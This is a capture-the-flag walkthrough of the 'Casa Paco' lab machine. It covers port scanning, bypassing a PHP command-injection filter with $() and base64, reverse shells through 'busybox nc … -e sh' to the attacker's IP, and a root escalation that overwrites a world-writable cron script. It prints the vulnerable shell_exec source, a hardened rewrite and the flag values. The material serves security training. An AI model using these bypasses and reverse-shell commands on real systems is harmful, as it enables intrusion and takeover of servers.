TheHackersLabs - Casa Paco: Detailed Machine Walkthrough (WP)
城南花已开

Information Gathering

Service Enumeration

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.152 08:00:27:91:ed:24 (Unknown)
192.168.60.254 00:50:56:f0:df:73 (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.971 seconds (129.88 hosts/sec). 4 responded
export ip=192.168.60.152
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Port scanning: Because every port has a story to tell.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.152:22
Open 192.168.60.152:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-15 10:55 CST
Initiating ARP Ping Scan at 10:55
Scanning 192.168.60.152 [1 port]
Completed ARP Ping Scan at 10:55, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:55
Completed Parallel DNS resolution of 1 host. at 10:55, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 10:55
Scanning 192.168.60.152 [2 ports]
Discovered open port 22/tcp on 192.168.60.152
Discovered open port 80/tcp on 192.168.60.152
Completed SYN Stealth Scan at 10:55, 0.07s elapsed (2 total ports)
Nmap scan report for 192.168.60.152
Host is up, received arp-response (0.00056s latency).
Scanned at 2025-01-15 10:55:18 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:91:ED:24 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Visiting port 80 reveals a domain name, so add a hosts entry:

❯ sudo vim /etc/hosts
192.168.60.152 casapaco.thl


Command Injection

The takeaway-order page turns out to have a command injection vulnerability.


Arbitrary commands can be executed, but as soon as the input contains a semicolon it fails and the page tells you not to hack it 🤣

I guessed a lot, trying different ways of chaining commands.

Fortunately, `$()` works as a bypass in the end. Backticks can also execute commands but don't get past the filter; presumably the filter is hardcoded in the file.


I tried to cat the handler file, but the source doesn't seem to display completely, only partially; that part is probably being parsed as PHP.


Wait, wrong file: the PHP file without the "1" suffix is the actual handler script.

echo can also be used for a bypass:

echo -n 'cat /etc/passwd' |base64
Y2F0IC9ldGMvcGFzc3dk

This gives a username: pacogerente


Since `$()` gets past the filter, let's try for a reverse shell.

It turns out the target has neither nc nor wget, so how do we get a shell back?

It does have busybox, though, so use that directly.


www-data Shell and Privilege Escalation

`busybox nc 192.168.60.100 4444 -e s$()h` gets a shell.

Looking at the handler logic: there is indeed a blacklist, plus an allow-list; only input matching the allow-list is executed, and `$()` happens to fall within the allowed character set.

(remote) www-data@Thehackerslabs-CasaPaco:/var/www/html$ cat llevar.php
<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Casa Paco - Para Llevar</title>
    <link rel="stylesheet" href="static/styles.css">
</head>
<body>
    <header>
        <h1>Casa Paco - Pedido para Llevar</h1>
    </header>

    <main>
        <h2>Haz tu pedido para llevar</h2>
        <form action="llevar.php" method="POST" class="order-form">
            <label for="name">Nombre:</label>
            <input type="text" id="name" name="name" placeholder="Tu nombre" required><br>
            <label for="dish">Plato:</label>
            <input type="text" id="dish" name="dish" placeholder="Ejemplo: Cocido" required><br>
            <button type="submit" class="btn">Enviar Pedido</button>
        </form>

        <?php
        if ($_SERVER["REQUEST_METHOD"] === "POST") {
            $name = htmlspecialchars($_POST["name"]);
            $dish = $_POST["dish"];

            // Filter to block simple commands
            $pattern_blacklist = '/\b(whoami|ls|pwd|cat|sh|bash)\b/i';
            if (preg_match($pattern_blacklist, $dish)) {
                die('<p style="color: red;">Error: Pide comida no intentes hackearme. Los callos estan muy ricos.</p>');
            }

            // Allow only characters and more complex command structures
            $allowed_pattern = '/^[a-zA-Z0-9\s\$\(\)\-\_\.\|]*$/';
            if (!preg_match($allowed_pattern, $dish)) {
                die('<p style="color: red;">Error: Pide comida no intentes hackearme. Los callos estan muy ricos.</p>');
            }

            // Vulnerable command
            $output = shell_exec("$dish");

            echo '<section class="confirmation">';
            echo '<h3>Pedido confirmado</h3>';
            echo "<p>Gracias, <strong>$name</strong>. Tu pedido de <strong>$dish</strong> estará listo para llevar.</p>";
            echo '<h3>Salida del Comando:</h3>';
            echo "<pre>$output</pre>";
            echo '</section>';
        }
        ?>
    </main>

    <footer>
        <p>&copy; 2025 Casa Paco. Todos los derechos reservados.</p>
    </footer>
</body>
</html>
(remote) www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ cat user.txt
e9745364e54d369f049d735678e5c57a
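The handler above fails for a structural reason, not a regex-tuning one: a word blacklist plus a character allow-list still lets shell syntax through, because the allowed set includes `$`, `(`, `)` and `|`, and the result is then handed to `shell_exec()`. The following is an added example, not code from the Casa Paco machine, showing how the POST block would be written so that user input never becomes a command: the dish is allow-listed by value against a fixed menu, and, if a program ever had to be invoked, the validated value is passed as a single argument through `escapeshellarg()` to a fixed binary. The menu entries and the `/usr/local/bin/kitchen-queue` program name are assumptions for illustration.

```php
<?php
// Added example (not llevar.php from the machine): a hardened replacement
// for the request-handling block. Instead of filtering characters out of a
// string that is then executed, the order is matched against a fixed menu
// and no shell string is ever built from user input.

declare(strict_types=1);

// Constructed menu; the real site's dish list is not on the page.
const MENU = ['cocido', 'fabada', 'callos', 'paella'];

/**
 * Return the canonical menu name for the customer's input, or null when
 * the input is not exactly one known dish. This is value-level
 * allow-listing, which replaces the character-level regex entirely.
 */
function validate_dish(string $dish): ?string
{
    $key = strtolower(trim($dish));
    return in_array($key, MENU, true) ? $key : null;
}

/**
 * Only if an external program genuinely had to run (the original called
 * shell_exec("$dish")): invoke a fixed program and pass the already
 * validated value as one escaped argument, so the shell never parses
 * user-controlled text. The program path is hypothetical.
 */
function build_kitchen_command(string $dish): ?string
{
    $safe = validate_dish($dish);
    if ($safe === null) {
        return null;
    }
    return '/usr/local/bin/kitchen-queue ' . escapeshellarg($safe);
}

/**
 * Request handler mirroring the original block's structure: reject
 * unknown dishes instead of trying to sanitize them, and HTML-escape
 * everything that is echoed back.
 */
function handle_order(array $post): string
{
    $name = htmlspecialchars($post['name'] ?? '', ENT_QUOTES, 'UTF-8');
    $dish = validate_dish($post['dish'] ?? '');
    if ($dish === null) {
        // Do not echo the rejected input back into the page.
        return '<p style="color: red;">Error: ese plato no está en la carta.</p>';
    }
    $dishHtml = htmlspecialchars($dish, ENT_QUOTES, 'UTF-8');
    return "<p>Gracias, <strong>$name</strong>. Tu pedido de "
         . "<strong>$dishHtml</strong> estará listo para llevar.</p>";
}

// Self-check with constructed inputs when run from the command line.
if (PHP_SAPI === 'cli') {
    $cases = [
        'Cocido',        // legitimate order, case-insensitive -> accepted
        ' fabada ',      // surrounding whitespace is tolerated -> accepted
        'cocido $(id)',  // shell substitution, allowed by the old regex -> rejected
        'cocido | id',   // pipe, allowed by the old regex -> rejected
        'callos;id',     // semicolon -> rejected
    ];
    foreach ($cases as $c) {
        $v = validate_dish($c);
        printf("%-18s -> %s\n", var_export($c, true), $v ?? 'REJECTED');
    }
    echo handle_order(['name' => 'Ana <b>', 'dish' => 'Paella']), "\n";
}
```

Running the file with `php` prints the verdict for each constructed input; the two genuine orders are accepted and the three containing shell syntax are rejected without any regex having to enumerate dangerous characters. The design point is that the filter in llevar.php was answering the wrong question ("does this string look like a command?") when the application only ever needed to answer "is this one of our dishes?".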

Root Privilege Escalation

Unexpectedly, www-data already has permission to read user.txt directly.

There is also a script in the user's home directory with mode 766; I guessed root runs it periodically.

Upload pspy to monitor processes:

(remote) www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ ls -al
total 44
drwxr-xr-x 3 pacogerente pacogerente 4096 Jan 14 17:08 .
drwxr-xr-x 3 root root 4096 Jan 14 16:52 ..
lrwxrwxrwx 1 root root 9 Jan 14 16:58 .bash_history -> /dev/null
-rw-r--r-- 1 pacogerente pacogerente 220 Mar 29 2024 .bash_logout
-rw-r--r-- 1 pacogerente pacogerente 3526 Mar 29 2024 .bashrc
drwxr-xr-x 3 pacogerente pacogerente 4096 Jan 13 20:24 .local
-rw-r--r-- 1 pacogerente pacogerente 807 Mar 29 2024 .profile
-rwxrw-rw- 1 pacogerente pacogerente 110 Jan 14 16:57 fabada.sh
-rw-r--r-- 1 root root 11268 Jan 15 16:41 log.txt
-rw-r--r-- 1 pacogerente pacogerente 33 Jan 14 17:06 user.txt
(remote) www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ cd /tmp/
(remote) www-data@Thehackerslabs-CasaPaco:/tmp$ ./pspy64
2025/01/15 16:31:02 CMD: UID=0 PID=12897 | /usr/sbin/CRON -f
2025/01/15 16:31:02 CMD: UID=0 PID=12898 | /usr/sbin/CRON -f
2025/01/15 16:31:02 CMD: UID=0 PID=12899 | /bin/sh -c /home/pacogerente/fabada.sh
2025/01/15 16:31:02 CMD: UID=0 PID=12900 | /bin/bash /home/pacogerente/fabada.sh

Sure enough.

So just overwrite the script file and it's done:

(remote) www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ echo "busybox nc 192.168.60.100 1234 -e sh">fabada.sh
(remote) www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ cat fabada.sh
busybox nc 192.168.60.100 1234 -e sh

Listen on the port and wait:

❯ pwncat-cs -lp 1234
(local) pwncat$
(remote) root@Thehackerslabs-CasaPaco:/root# cat /root/root.txt
452354bjb5434mn43b5j678e5c57a

That's it. There was no need to escalate to the user account first; it goes straight to root. Fairly simple overall; the only place I got stuck for a while was earlier, working out the command injection bypass.
